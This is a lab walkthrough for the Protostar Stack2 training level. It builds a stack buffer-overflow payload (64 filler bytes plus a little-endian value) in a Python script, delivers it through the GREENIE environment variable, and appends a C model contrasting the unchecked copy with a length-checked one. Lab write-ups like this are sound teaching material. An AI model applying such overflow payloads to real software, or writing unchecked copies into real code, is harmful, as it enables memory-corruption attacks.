Protostar 0x02 - Stack2
Prev: 0x01 - Stack1
Next: 0x03 - Stack3
This level is again very similar to the previous one, although this time there is an added variable named "variable," which is initialized by calling "getenv" on an environment variable named "GREENIE" that is not yet set.
We can confirm that this mysterious "GREENIE" variable is not yet set by running the program:
$ ./stack2
stack2: please set the GREENIE environment variable
Looking ahead in the source code, we see that the "GREENIE" variable is copied into "buffer," and then "modified" is checked to see if it equals "0x0d0a0d0a." Much like the last level, we'll need the input to contain 64 dummy bytes to fill "buffer," followed by the requested value for "modified" in little-endian byte order. However, this time, we'll need to place this into an environment variable named "GREENIE."
Let's again bring stack2 with us to the /tmp folder and craft our Python script:
$ cp stack2 /tmp
$ cd /tmp
$ nano stack2.py
Our Python file:
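import struct

# Python 2 syntax. 64 filler bytes to fill "buffer"
buffer = "A" * 64
# The value "modified" is compared against, packed as a little-endian 32-bit integer
modified = struct.pack("<I", 0x0d0a0d0a)
payload = buffer + modified
print payload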
Now, we just need to set this to an environment variable named "GREENIE." We can do this by simply stating "GREENIE=`python stack2.py`" and exporting it. Then, we can confirm it worked by calling "printenv" on "GREENIE."
$ GREENIE=`python stack2.py`
$ export GREENIE
$ printenv GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
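Great! The four bytes after the 64 "A"s are line-feed (0x0a) and carriage-return (0x0d) characters, so they do not show up as visible text in the output. Now, since the "stack2" program itself takes care of setting "buffer" based on the "GREENIE" variable, if we run the program we can see if we've accomplished our objective: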
$ ./stack2
you have correctly modified the variable
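As an added example (not part of the original walkthrough and not the Protostar source), this C model shows why the copy from "GREENIE" reaches "modified" and how a length check stops it. The struct layout, the function names and the sample payload are assumptions constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model (assumption) of the frame described above: 64-byte buffer, then "modified". */
struct frame { char buffer[64]; unsigned char modified[4]; };

/* Decode "modified" as the 32-bit little-endian integer the x86 target would see. */
static uint32_t read_modified(const struct frame *f) {
    return (uint32_t)f->modified[0] | (uint32_t)f->modified[1] << 8 |
           (uint32_t)f->modified[2] << 16 | (uint32_t)f->modified[3] << 24;
}

/* Constructed sample input: 64 filler bytes plus 0x0d0a0d0a in little-endian order. */
void make_payload(char out[69]) {
    memset(out, 'A', 64);
    memcpy(out + 64, "\x0a\x0d\x0a\x0d", 4);
    out[68] = '\0';
}

/* Unchecked copy: the value's length alone decides how much is written, so bytes
   past 64 reach "modified". Clamped to the struct so the model stays defined C. */
uint32_t copy_unchecked(const char *value) {
    struct frame f;
    size_t n = strlen(value);
    memset(&f, 0, sizeof f);
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, value, n);
    return read_modified(&f);
}

/* Checked copy: refuse any value that does not fit with its terminator. */
int copy_checked(const char *value, uint32_t *modified_out) {
    struct frame f;
    size_t n = strlen(value);
    memset(&f, 0, sizeof f);
    if (n >= sizeof f.buffer) return -1;      /* too long: nothing is copied */
    memcpy(f.buffer, value, n + 1);
    *modified_out = read_modified(&f);
    return 0;
}

int main(void) {
    char payload[69];
    uint32_t m = 0;
    make_payload(payload);
    printf("unchecked: modified = 0x%08x\n", (unsigned)copy_unchecked(payload));
    printf("checked:   %s\n", copy_checked(payload, &m) ? "rejected" : "accepted");
    return 0;
}
```

The checked version treats the environment variable as untrusted input and compares its length to the destination size before any byte is written.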